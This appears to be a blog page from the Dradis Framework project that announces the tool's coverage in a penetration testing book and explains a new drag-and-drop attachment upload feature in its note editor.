-J Wolfgang Goerlich

Dradis Framework featured in Advanced Penetration Testing for Highly-Secure Environments

Quick post to let you know that there is extensive coverage of our project in the new Advanced Penetration Testing for Highly-Secure Environments by Lee Allen.

Coverage goes from our very own Introduction to the Dradis Framework section in Chapter 1 to several other bits and pieces throughout the rest of the book. Check it out!

Thanks to Lee and kudos to @luisfer_nandez for letting us know.

Drag’n’drop attachment uploads

Up until now, adding screenshots to your notes has been a bit problematic. You had to go to the Attachments tab, upload the image, click it to get the URL, go back to the Notes tab, open the editor and paste the link. This led to a very upvoted feature request: Add image upload functionality to Note Editor.

Recently we’ve managed to sort this out and create a much cleaner solution to solve this problem: you can now drag and drop files to the Editor window, upload and copy the resulting attachment URLs to use them in the note’s text. Let me show you how:

When invoking the note Editor (either from the add note button or double-clicking on an existing note), apart from the familiar Write and Preview tabs, there will be a third tab: Attachments.

This tab features a drop zone and some controls to manage the upload process. You can drag files from your desktop into the drop zone to stage them for upload:

Have you noticed the preview images you get even before uploading anything?

Anyway, you can upload them one at a time using the controls in each row or all at once using the general controls below the drop zone.

Once they are uploaded a link is provided to each attachment. You can right-click on the link to copy the attachment’s URL for use in your notes.

The drag’n’drop feature is dependent on your browser, you will need Firefox 4.0+, Google Chrome or Safari 5.0+.

This feature is already available in the master branch of the Dradis Community and Dradis Professional editions.